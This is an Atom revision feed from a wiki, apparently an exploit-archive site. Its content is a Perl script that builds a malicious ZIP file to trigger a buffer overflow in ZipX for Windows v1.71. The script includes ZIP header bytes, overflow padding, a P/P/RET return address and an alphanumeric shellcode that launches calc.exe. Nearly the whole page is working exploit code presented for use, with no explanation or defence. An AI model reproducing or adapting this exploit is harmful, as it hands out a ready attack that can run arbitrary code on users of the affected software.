<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=ZipX_for_Windows_v1.71_ZIP%E6%96%87%E4%BB%B6%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E</id>
	<title>ZipX for Windows v1.71 ZIP文件緩衝區溢出漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=ZipX_for_Windows_v1.71_ZIP%E6%96%87%E4%BB%B6%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=ZipX_for_Windows_v1.71_ZIP%E6%96%87%E4%BB%B6%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-13T09:09:24Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=ZipX_for_Windows_v1.71_ZIP%E6%96%87%E4%BB%B6%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=705&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; #!/usr/bin/perl # #[+]Exploit Title: ZipX for Windows v1.71 ZIP File Buffer Overflow Exploit #[+]Date: 05\09\2011 #[+]Author: C4SS!0 G0M3S #[+]Software Link: htt...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=ZipX_for_Windows_v1.71_ZIP%E6%96%87%E4%BB%B6%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=705&amp;oldid=prev"/>
		<updated>2021-03-27T03:12:25Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; #!/usr/bin/perl # #[+]Exploit Title: ZipX for Windows v1.71 ZIP File Buffer Overflow Exploit #[+]Date: 05\09\2011 #[+]Author: C4SS!0 G0M3S #[+]Software Link: htt...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#!/usr/bin/perl&lt;br /&gt;
#&lt;br /&gt;
#[+]Exploit Title: ZipX for Windows v1.71 ZIP File Buffer Overflow Exploit&lt;br /&gt;
#[+]Date: 05\09\2011&lt;br /&gt;
#[+]Author: C4SS!0 G0M3S&lt;br /&gt;
#[+]Software Link: http://download.cnet.com/ZipX/3000-2250_4-10518937.html&lt;br /&gt;
#[+]Version: v1.71&lt;br /&gt;
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese&lt;br /&gt;
#[+]CVE: N/A&lt;br /&gt;
#&lt;br /&gt;
#&lt;br /&gt;
#Reproduce:&lt;br /&gt;
#Open the zip file, after click in &amp;quot;Encrypt&amp;quot;, type you password and click in &amp;quot;Ok&amp;quot; BOOM!!!&lt;br /&gt;
#See the calc.exe&lt;br /&gt;
#&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
use strict;&lt;br /&gt;
use warnings;&lt;br /&gt;
&lt;br /&gt;
my $filename = &amp;quot;Exploit.zip&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
print &amp;quot;\n\n\t\tZipX for Windows v1.71 ZIP File Buffer Overflow Exploit\n&amp;quot;;&lt;br /&gt;
print &amp;quot;\t\tCreated by C4SS!0 G0M3S\n&amp;quot;;&lt;br /&gt;
print &amp;quot;\t\tE-mail louredo_\@hotmail.com\n&amp;quot;;&lt;br /&gt;
print &amp;quot;\t\tSite http://net-fuzzer.blogspot.com/\n\n&amp;quot;;&lt;br /&gt;
sleep(1);&lt;br /&gt;
&lt;br /&gt;
print &amp;quot;\t\t[+]Creating ZIP File...\n&amp;quot;;&lt;br /&gt;
sleep(1);&lt;br /&gt;
my $head = &amp;quot;\x50\x4B\x03\x04\x14\x00\x00&amp;quot;.&lt;br /&gt;
&amp;quot;\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00&amp;quot; .&lt;br /&gt;
&amp;quot;\x00\x00\x00\x00\x00\x00\x00\x00&amp;quot; .&lt;br /&gt;
&amp;quot;\xe4\x0f&amp;quot; .&lt;br /&gt;
&amp;quot;\x00\x00\x00&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
my $head2 = &amp;quot;\x50\x4B\x01\x02\x14\x00\x14&amp;quot;.&lt;br /&gt;
&amp;quot;\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00&amp;quot; .&lt;br /&gt;
&amp;quot;\x00\x00\x00\x00\x00\x00\x00\x00\x00&amp;quot;.&lt;br /&gt;
&amp;quot;\xe4\x0f&amp;quot;.&lt;br /&gt;
&amp;quot;\x00\x00\x00\x00\x00\x00\x01\x00&amp;quot;.&lt;br /&gt;
&amp;quot;\x24\x00\x00\x00\x00\x00\x00\x00&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
my $head3 = &amp;quot;\x50\x4B\x05\x06\x00\x00\x00&amp;quot;.&lt;br /&gt;
&amp;quot;\x00\x01\x00\x01\x00&amp;quot;.&lt;br /&gt;
&amp;quot;\x12\x10\x00\x00&amp;quot;.&lt;br /&gt;
&amp;quot;\x02\x10\x00\x00&amp;quot;.&lt;br /&gt;
&amp;quot;\x00\x00&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
my $shellcode =&lt;br /&gt;
&amp;quot;PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIHZXL9ID414ZTOKHI9LMUK&amp;quot; .&lt;br /&gt;
&amp;quot;VPZ6QO9X1P26QPZTW5S1JR7LCTKN8BGR3RWS9JNYLK79ZZ165U2KKLC5RZGNNUC70NEPB9OUTQMXPNMM&amp;quot; .&lt;br /&gt;
&amp;quot;PV261UKL71ME2NMP7FQY0NOHKPKZUDOZULDS8PQ02ZXM3TCZK47PQODJ8O52JNU0N72N28MZKLTNGU7Z&amp;quot; . # Shellcode WinExec &amp;quot;calc.exe&amp;quot;&lt;br /&gt;
&amp;quot;UXDDXZSOMKL4SQKUNKMJPOOCRODCMDKR0PGQD0EYIRVMHUZJDOGTUV2WP3OIVQ1QJSLSKGBLYKOY7NWW&amp;quot; . # Alpha Numeric Shellcode BaseAddress EAX&lt;br /&gt;
&amp;quot;LNG6LBOM5V6M0KF2NQDPMSL7XT80P61PBMTXYQDK5DMLYT231V649DZTPP26LWSQRLZLQK15XUXYUNP1&amp;quot; .&lt;br /&gt;
&amp;quot;BPF4X6PZIVOTZPJJRUOCC3KD9L034LDOXX5KKXNJQMOLSJ6BCORL9WXQNKPUWNKRKJ8JSNS4YMMOHT3Z&amp;quot; .&lt;br /&gt;
&amp;quot;QJOHQ4QJUQLN1VSLV5S1QYO0YA&amp;quot;;&lt;br /&gt;
my $payload = &amp;quot;A&amp;quot; x 330;&lt;br /&gt;
$payload .=&lt;br /&gt;
(&amp;quot;\x66\x05\x4D\xCD&amp;quot; x 4).&lt;br /&gt;
&amp;quot;\x66\x05\x19\x18&amp;quot;. # ADD AX,1819&lt;br /&gt;
&amp;quot;\x54\x5A\x50\x5B&amp;quot;. # PUSH ESP # POP EDX # PUSH EAX # POP EBX&lt;br /&gt;
&amp;quot;\x2B\xE0&amp;quot;. # Afer convertion SUB EDX,EBX&lt;br /&gt;
&amp;quot;\x52\x58&amp;quot;. # PUSH EDX # POP EAX&lt;br /&gt;
&amp;quot;\x98\xd1&amp;quot;; # CALL EAX&lt;br /&gt;
$payload .= &amp;quot;C&amp;quot; x (371-length($payload));&lt;br /&gt;
$payload .= &amp;quot;\x3C\x01\x75\xd1&amp;quot;; # Converted is that &amp;quot;\x3c\x04\x75\xd0&amp;quot;&lt;br /&gt;
$payload .= pack('V',0x0041334d); # P/P/RET&lt;br /&gt;
$payload .= $shellcode;&lt;br /&gt;
$payload .= &amp;quot;B&amp;quot; x (4064-length($payload));&lt;br /&gt;
$payload = $payload.&amp;quot;.rar&amp;quot;;&lt;br /&gt;
my $zip = $head.$payload.$head2.$payload.$head3;&lt;br /&gt;
open(FILE,&amp;quot;&amp;gt;$filename&amp;quot;) || die &amp;quot;\t\t[-]Error:\n$!\n&amp;quot;;&lt;br /&gt;
print FILE $zip;&lt;br /&gt;
close(FILE);&lt;br /&gt;
print &amp;quot;\t\t[+] ZIP File Created With Sucess:)\n&amp;quot;;&lt;br /&gt;
sleep(3);&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>